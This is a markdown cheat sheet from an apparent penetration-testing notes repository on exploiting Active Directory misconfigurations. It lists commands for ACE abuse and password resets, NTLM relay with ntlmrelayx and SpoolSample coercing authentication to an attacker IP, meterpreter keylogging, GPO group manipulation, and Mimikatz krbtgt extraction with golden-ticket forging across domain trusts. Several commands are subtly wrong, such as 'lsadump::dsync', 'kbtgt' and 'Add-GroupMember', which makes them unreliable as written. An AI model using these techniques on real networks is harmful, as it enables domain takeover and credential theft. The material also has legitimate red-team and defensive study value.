killchain-compendium/misc/active_directory/ad_misconfiguration.md

# Active Directory Misconfigurations

## Permission Delegation

* Permissions to functions may be delegated as a standard functions itself
* Privilege creep becomes a problem eventually
* Discretionary ACLs are controlled by Access Control Entries (ACEs)

### The following ACEs are critical and prone to be exploited

* __GenericAll__, complete control and creation of an object
* __ForceChangePassword__, change the password of a user and sometimes administrator passwords
* __AddMembers__, add a user to an existing group
* __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts.
* __WriteOwner__, change owner of a target object. 
* __WriteDACL__, create new ACEs to an object's DACL
* __AllExtendendRights__ all control over an object's permission

### Tools to exploit ACEs

* AD-RSAT
* Powersploit

* BloodHound, check permissions to target

### Usage

* Add user to a group via powershell
```sh
Add-GroupMember "<GroupName>" -Members "<username>"
```

* List info about groups, preferably administration groups
```sh
Get-ADGroupMember -Identity "<GroupName>"
```

* __Set new password for user__, afterwards reconnect session
```sh
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force 
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
```

## Kerberos Delegation

* Unconstrained (without limit) delegation, [exploit](https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976)
* Constrained delegation
* Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)

### Delegatable Services

* __HTTP__
* __CIFS__
* __LDAP__
* __HOST__
* __MSSQL__

### Usage

* Enumerate via powerview
```sh
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
```

## Automated Relays

### Machine Accounts

* Administrative machine account of one host having administrative permissions over another host

### Printers

* Target has to have an SMB server
* Spooler, PetitPotam, PrintNightmare are printer exploits
* Query printer services through a servers domain
```sh
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
```
* SMB signing may be enabled but must not be enforced in order for the exploit to work, check via
```sh
nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
```
* Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
```
* Authenticate on attacker with the credentials already gained from a windows computer 
```sh
SpoolSample.exe <domain> "$ATTACKER_IP"
```
* Authenticate with the received credential
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
```

## Active Directory Users

### Credentials

### Keylogging

* With a meterpreter shell migrate to an active user's process and set a keylogger
```sh
migrate <processID>
keyscan_start
```
* To inspect the results
```sh
keyscan_dump
```

## Group Policy Objects

* Every `GPO` has a `GUID`
* Local Policies are configured for application rules for FW, Windows-Defender, Applocker
    * Other local policies are group memberships, startup config, protocols
    * Group policies change configuration of these remotely over AD
* `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain

### Usage

* Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
* Start a `cmd` with a AD user and execute `mmc` through it
```sh
runas /netonly /user:<domain>\<username> cmd.exe
mmc
```
* Check connection of the `cmd.exe` via 
```sh
dir \\<domain>\sysvol
```
* Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK`
* On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `<domain>` -> `Server` -> `Management Servers` and right click to edit the group
* On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups

## Certificates

* [AD Certificate Services](./AD_CS.md)

## Domain Trusts

* Domain Trusts offer access to resources to users in the domain
    * Directional, from trusted domain to another truster domain
    * Transitive, beyond more than just one other domain


* Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
* `krbtgt` as an account signs and encrypts TGTs
* Crafting a golden ticket by becoming a TGS. Following info is needed
    * FQDN
    * Security identifier of the domain (SI)
    * Target's username
    * __KRBTGT password hash__ store on the DC

### Usage

* `KRBTGT` via Mimikatz, resulting in `Hash NTLM`
```sh
privilege::debug
lsadump::dsync /user:<username\kbtgt>
```
* Craft the ticket with the help of this hash

* Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21-<RootDomain>-519`
* SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
* Get child SIDs via
```sh
Get-ADComputer -Identity "<DCChildCN>"
```
* Get parent SID via
```sh
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
```
* Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz
```sh
privilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$ 
```